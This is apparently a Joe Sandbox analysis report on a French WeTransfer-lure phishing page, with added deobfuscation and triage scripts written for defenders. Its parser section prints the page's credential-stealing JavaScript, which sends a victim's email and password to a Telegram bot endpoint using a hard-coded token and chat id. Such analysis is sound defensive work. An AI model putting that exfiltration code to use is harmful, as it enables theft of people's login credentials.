
Windows Analysis Report
https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_camp

Overview

General Information

Sample URL:https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_net
Analysis ID:1670900
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
AI detected suspicious Javascript
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Non-HTTPS page querying sensitive user data (password, username or email)

Classification

Classification chart: category wheel (Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner) with verdict scale clean / suspicious / malicious. This sample falls under Phishing with verdict malicious (classification label mal64.phis.win).
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp                          SID      Severity  Classtype                Source IP     Src Port  Destination IP   Dst Port  Protocol
2025-04-22T09:46:18.207394+0200    1810007  1         Potentially Bad Traffic  192.168.2.16  50053     149.154.167.220  443       TCP
2025-04-22T09:46:19.540811+0200    1810007  1         Potentially Bad Traffic  192.168.2.16  50055     149.154.167.220  443       TCP



Phishing

Source: file:///C:/Users/user/Desktop/Facture%20012365.html | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.19.pages.csv
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.20.pages.csv
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.21.pages.csv
Source: 1.199..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Facture%20012365.htm... The script shows several high-risk behaviours that indicate malicious intent:
  1. Obfuscated string lookup: the `_0x1298` function subtracts a fixed offset (0x121) from its argument and indexes the string array returned by `_0x190b()`, so the real strings (API host, field names, redirect target) are only assembled at run time. This is a high-risk indicator.
  2. Data exfiltration: the script sends the entered email and password to a Telegram Bot API `sendMessage` endpoint using a hard-coded bot token and chat id. This is a clear credential-exfiltration channel and a high-risk indicator.
  3. Obfuscated code: variable and function names are hex-style `_0x...` identifiers, a high-risk indicator.
  4. Decoy redirect: the script also redirects the user to wetransfer.com. The domain itself is legitimate; it is used as a decoy so the victim lands on the real service and does not notice the theft, matching the WeTransfer lure in the page title.
Overall, the combination of these behaviours indicates a highly malicious script that should be blocked and investigated further.
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: script excerpt (the parser output is lower-cased and truncated; JavaScript built-ins and the Telegram method name are shown in their real case, the French comment is translated):
    var _0x40d1b3 = _0x1298;
    // String-array decoder: the first call builds the table via _0x190b(),
    // then replaces itself with a lookup that subtracts 0x121 and indexes it.
    function _0x1298(_0x93b389, _0x301fc5) {
      var _0x190b9e = _0x190b();
      return (
        (_0x1298 = function (_0x12988f, _0x35f94c) {
          _0x12988f = _0x12988f - 0x121;
          var _0x866d3 = _0x190b9e[_0x12988f];
          return _0x866d3;
        }),
        _0x1298(_0x93b389, _0x301fc5)
      );
    }
    // Exfiltration: sends "<email>:<password>" to a Telegram chat via the Bot API.
    function _0x1298a(data) {
      const _0x40d1b3a = '7323885544:aagjtnqqrvbilbh0dhfsyc9qs_pg5mapcgk'; // bot token as shown in the parser output (lower-cased)
      const _0x301fc5a = '5442419581';                                      // chat id
      const _0x93b389a = ` - ${data.email}:${data.password}`;
      const _0x190b9ea = `https://api.telegram.org/bot${_0x40d1b3a}/sendMessage?chat_id=${_0x301fc5a}&text=${encodeURIComponent(_0x93b389a)}`;
      fetch(_0x190b9ea, { method: "GET" })
        .then((response) => {
          if (response.ok) {
            // the request succeeded
          } else {
          }
        })
        .catch((error) => {
          console.error(error);
        });
    }
    function _0x190b() { var _0...
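As an added example (not part of the sandbox report or the captured page), the following resolver shows how the `_0x1298` string-array lookup above works and how to undo it statically without executing the page. The string table, the obfuscated body, the bot token and chat id in it, and the names `resolveIndex`, `deobfuscate` and `extractTelegramExfil` are all this example's own constructions; only the offset 0x121 and the call shape `_0x1298(0x...)` come from the captured script.

```javascript
// Added example: a static resolver for the string-array obfuscation seen in
// the captured script. It is not code from the sandbox report or from the
// phishing page. The captured `_0x1298(a, b)` decoder subtracts 0x121 from
// `a` and returns that slot of the table built by `_0x190b()`; resolving
// each call on paper gives back the real strings.
// STRING_TABLE and OBFUSCATED_SOURCE below are constructed for illustration;
// the bot token and chat id in them are placeholders, not real values.

const OFFSET = 0x121; // the base the captured decoder subtracts

// Constructed string table in the style of the `_0x190b()` array.
const STRING_TABLE = [
  "https://api.telegram.org/bot1234567890:AAExampleTokenExampleTokenExampleTo/sendMessage?chat_id=5550001234&text=", // 0x121
  "email",                   // 0x122
  "password",                // 0x123
  "GET",                     // 0x124
  "https://wetransfer.com/", // 0x125 decoy redirect target
];

// Constructed obfuscated body in the style of the captured script.
const OBFUSCATED_SOURCE = `
const u = _0x1298(0x121) + encodeURIComponent(" - " + d[_0x1298(0x122)] + ":" + d[_0x1298(0x123)]);
fetch(u, { method: _0x1298(0x124) }).then(() => { location.href = _0x1298(0x125); });
`;

// Mirror of the decoder's arithmetic: slot = argument - OFFSET.
function resolveIndex(hexArg, table = STRING_TABLE, offset = OFFSET) {
  const idx = parseInt(hexArg, 16) - offset;
  if (!Number.isInteger(idx) || idx < 0 || idx >= table.length) {
    throw new RangeError(`argument ${hexArg} is outside the string table`);
  }
  return table[idx];
}

// Replace every `_0x1298(0x...)` call with the literal it resolves to.
// Only calls with a numeric literal argument are resolved; anything else is
// left untouched so the analyst can see what still needs attention.
function deobfuscate(source, table = STRING_TABLE, offset = OFFSET) {
  return source.replace(/_0x1298\((0x[0-9a-fA-F]+)\)/g, (_m, hex) =>
    JSON.stringify(resolveIndex(hex, table, offset)),
  );
}

// Pull the Telegram bot token and chat id out of decoded source so they can
// be reported to Telegram and blocked. Returns null when no such URL exists.
function extractTelegramExfil(decodedSource) {
  const m = decodedSource.match(
    /api\.telegram\.org\/bot(\d+:[A-Za-z0-9_-]+)\/sendMessage\?chat_id=(\d+)/,
  );
  return m ? { botToken: m[1], chatId: m[2] } : null;
}

// Stand-alone run: print the decoded script and the exfiltration target.
const decoded = deobfuscate(OBFUSCATED_SOURCE);
console.log(decoded);
console.log(extractTelegramExfil(decoded));
```

The captured decoder takes a second argument it never uses, which is characteristic of obfuscator.io-style output. That toolchain can also rotate the string array at load time; if the sample does, run the rotation first or evaluate the table in an isolated interpreter before resolving calls, because resolving against the unrotated table returns wrong strings silently.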
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01 | HTTP Parser: Total embedded image size: 23250
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01 | HTTP Parser: Base64 decoded: auth0|678f85cbbe51a88063644377 (the t_rid parameter of the wetransfer.com download link; an Auth0-style recipient identifier, i.e. tracking metadata, not part of the lure)
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: Title: Wetransfer - Partage de document. (French: "WeTransfer - Document sharing.") does not match URL
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: <input type="password" .../> found
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01 | HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.html | HTTP Parser: No <meta name="copyright".. found
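The HTTP Parser findings above are simple static heuristics, and they can be reproduced offline over a quarantined attachment before it is ever opened. The following is an added example, not the sandbox's code: `triageHtml` and `verdict` are names chosen here, `SAMPLE_HTML` is a constructed lure with a placeholder bot token rather than the captured file, and the scoring thresholds are illustrative, not Joe Sandbox's.

```javascript
// Added example: an offline triage pass that re-implements the HTTP Parser
// heuristics this report fired on (password input without a form action,
// Telegram Bot API reference, no outbound links, title brand vs. page host,
// hex-named identifiers, credential form not served over HTTPS). It is not
// code from the sandbox or the phishing page; triageHtml() and verdict()
// are this example's own names. SAMPLE_HTML is constructed to resemble the
// reported lure, with a placeholder bot token; it is not the captured file.

const SAMPLE_HTML = `<!doctype html>
<html><head><title>Wetransfer - Partage de document.</title></head>
<body>
<img src="data:image/png;base64,iVBORw0KGgo=" alt="logo">
<input type="email" id="email" placeholder="Adresse e-mail">
<input type="password" id="password" placeholder="Mot de passe">
<button id="go">Télécharger</button>
<script>
  var _0x40d1b3 = _0x1298;
  const u = "https://api.telegram.org/bot0000000000:AAConstructedTokenForTheExampleOnly0/sendMessage?chat_id=1";
  document.getElementById("go").onclick = () =>
    fetch(u + "&text=" + encodeURIComponent(email.value + ":" + password.value));
</script>
</body></html>`;

// Returns the list of heuristic findings for one HTML document. pageUrl is
// where the document was loaded from (file:///... for an opened attachment).
function triageHtml(html, pageUrl) {
  const findings = [];

  const hasPasswordInput = /<input[^>]*\btype\s*=\s*["']?password\b/i.test(html);
  const hasFormAction = /<form[^>]*\baction\s*=/i.test(html);
  if (hasPasswordInput && !hasFormAction) {
    findings.push("password input but no <form action>: credentials leave via script, not a form post");
  }

  const telegram = html.match(/api\.telegram\.org\/bot(\d+):[A-Za-z0-9_-]+/);
  if (telegram) findings.push(`Telegram Bot API endpoint (bot id ${telegram[1]})`);

  const anchorCount = (html.match(/<a\s[^>]*\bhref\s*=/gi) || []).length;
  if (hasPasswordInput && anchorCount === 0) findings.push("credential form with zero outbound links");

  // Compare the first word of <title> against the host the page came from.
  const title = (html.match(/<title>([^<]*)<\/title>/i) || ["", ""])[1];
  const brand = (title.match(/[a-z0-9]+/i) || [""])[0].toLowerCase();
  let host = "";
  try { host = new URL(pageUrl).hostname.toLowerCase(); } catch { host = ""; }
  if (brand && !host.includes(brand)) {
    findings.push(`title brand "${brand}" does not match page host "${host || "(local file)"}"`);
  }

  if (/_0x[0-9a-f]{4,}/i.test(html)) findings.push("hex-named identifiers (obfuscated JavaScript)");

  if (hasPasswordInput && !/^https:/i.test(pageUrl)) {
    findings.push("credential inputs on a page not served over HTTPS");
  }

  return findings;
}

// Crude score in the spirit of the report: three or more findings is
// treated as phishing, one or two as suspicious.
function verdict(findings) {
  if (findings.length >= 3) return "phishing";
  return findings.length > 0 ? "suspicious" : "clean";
}

// Stand-alone run against the constructed sample.
const sampleFindings = triageHtml(SAMPLE_HTML, "file:///C:/Users/user/Desktop/Facture%20012365.html");
console.log(verdict(sampleFindings), sampleFindings);
```

Run it with node; it prints the verdict and findings for the constructed sample. Regex checks are enough for a first pass, but a page can defeat them by building the input elements or the Telegram URL at run time, which is exactly what the string-array obfuscation is for; when the static pass comes back clean, the rendered DOM still needs to be inspected, which is what the report's own 1.19 to 1.21 pages.csv snapshots are.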

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:50055 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:50053 -> 149.154.167.220:443
Both alerts are on TLS connections (port 443) to the Telegram API address 149.154.167.220; the IDS identifies the destination, not the exfiltrated text, which stays inside the encrypted session.
Source: classification engine | Classification label: mal64.phis.win@0/0@0/0
MITRE ATT&CK matrix: tactic columns Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Technique cells visible in this extract: Gather Victim Identity Information, Acquire Infrastructure, Valid Accounts, Windows Management Instrumentation (1), Browser Extensions, Path Interception, Direct Volume Access, OS Credential Dumping, System Service Discovery, Remote Services, Data from Local System, Data Obfuscation, Exfiltration Over Other Network Medium, Abuse Accessibility Features.
Behavior Graph: ID 1670900, URL https://wetransfer.com/down..., start date 22/04/2025, architecture WINDOWS, score 64. Signature nodes attached to the URL node: Suricata IDS alerts for network traffic; AI detected phishing page; AI detected suspicious Javascript; Javascript uses Telegram API. No process or file nodes are present.

Source                                                Detection  Scanner          Label
https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01  0%  Avira URL Cloud  safe
file:///C:/Users/user/Desktop/Facture%20012365.html   0%         Avira URL Cloud  safe
No Antivirus matches
No contacted domains info
Name                                                 Malicious  Antivirus Detection    Reputation
file:///C:/Users/user/Desktop/Facture%20012365.html  true       Avira URL Cloud: safe  unknown
No contacted IP infos
Note the split between the two verdicts: Avira URL Cloud rates both the wetransfer.com delivery link and the local file path as safe (0%), because URL reputation scores the delivery domain, whereas the malicious content is the HTML attachment opened from disk; the sandbox's own classification of that file is malicious.
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1670900
Start date and time:2025-04-22 09:43:59 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Sample URL:https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:0
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Detection:MAL
Classification:mal64.phis.win@0/0@0/0
  • No process behavior to analyse as no analysis process or sample was found
  • Excluded IPs from analysis (whitelisted): 142.250.68.227, 142.251.2.84, 142.250.68.238, 20.109.210.53, 192.178.49.162, 150.171.27.10, 184.29.183.29, 192.178.49.195, 192.178.49.170
  • Excluded domains from analysis (whitelisted): clients2.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, translate.googleapis.com, bat.bing.com, update.googleapis.com, clientservices.googleapis.com, pagead2.googlesyndication.com
  • VT rate limit hit for: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01
No simulations
No context
No created / dropped files found
No static file info
No network behavior found
No statistics
No system behavior
No disassembly